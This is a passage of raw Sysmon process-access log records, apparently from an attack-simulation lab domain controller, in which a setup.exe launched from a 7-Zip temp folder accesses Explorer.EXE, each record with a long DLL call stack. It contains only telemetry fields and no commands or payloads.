13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|